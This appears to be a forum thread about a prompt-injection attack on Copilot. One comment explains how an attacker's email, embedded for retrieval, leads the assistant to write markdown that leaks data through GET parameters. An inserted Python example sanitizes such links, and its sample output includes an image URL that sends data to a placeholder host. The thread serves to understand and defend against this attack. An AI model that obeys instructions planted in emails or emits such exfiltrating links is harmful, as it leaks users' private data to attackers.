
Yes, the user has to explicitly make a prompt.


The way I understand it:

The attacker sends an email to the user, which is intercepted by Copilot, which processes the email and embeds it for RAG. The mail is crafted to have a high likelihood of being retrieved during regular prompting. Then Copilot will write evil markdown crafted to exfiltrate data using GET parameters, so the attack runs when the mail is received.
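The comment above describes assistant output that carries data out through the URL of a markdown link or image. One defensive control is to post-process everything the assistant emits before a renderer sees it: neutralise any link or image whose URL points off an allowlist or carries query/fragment data, so the renderer never issues the request. The following is an added example, not code from the thread or from Copilot; the allowlist, the regex and the sample output are constructed for illustration.

```python
import re
from urllib.parse import urlparse

# Hosts the rendered assistant output may reference (constructed allowlist, an assumption).
ALLOWED_HOSTS = {"docs.example.com"}

# Matches markdown images ![alt](url) and links [text](url).
# Group 1 is "!" for images, group 2 the label, group 3 the URL.
MD_LINK = re.compile(r'(!?)\[([^\]]*)\]\(([^)\s]+)(?:\s+"[^"]*")?\)')


def classify_url(url):
    """Return a reason string if the URL could act as an exfiltration channel, else None."""
    parsed = urlparse(url)
    if parsed.scheme not in ("http", "https"):
        return "non-http scheme"
    if parsed.hostname not in ALLOWED_HOSTS:
        return "host not on allowlist"
    # Even an allowlisted host must not receive data smuggled in the query or fragment.
    if parsed.query or parsed.fragment:
        return "URL carries query/fragment data"
    return None


def sanitize_markdown(text):
    """Neutralise suspicious links/images in assistant output.

    Returns (clean_text, findings). Images matter most: renderers fetch them
    automatically, which is what makes the exfiltration zero-click.
    """
    findings = []

    def repl(match):
        is_image, label, url = match.group(1), match.group(2), match.group(3)
        reason = classify_url(url)
        if reason is None:
            return match.group(0)
        findings.append({"url": url, "image": bool(is_image), "reason": reason})
        # Replace with inert text so no HTTP request is ever issued by the renderer.
        return f"[{label or 'link removed'}]"

    return MD_LINK.sub(repl, text), findings


# Constructed sample of what a manipulated assistant reply might look like.
SAMPLE = (
    "Here is the summary you asked for.\n"
    "![](https://collector.invalid/pixel.png?data=ACME-Q3-forecast)\n"
    "See [the policy](https://docs.example.com/policy.md) for details.\n"
)

if __name__ == "__main__":
    clean, found = sanitize_markdown(SAMPLE)
    print(clean)
    for f in found:
        print("blocked:", f)
```

The filter sits between the model and the renderer and logs every removal, which doubles as a detection signal: a spike in blocked image URLs with long query strings is worth an alert on its own.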


Don’t we call it a zero-click when the user is compromised just from visiting a website?
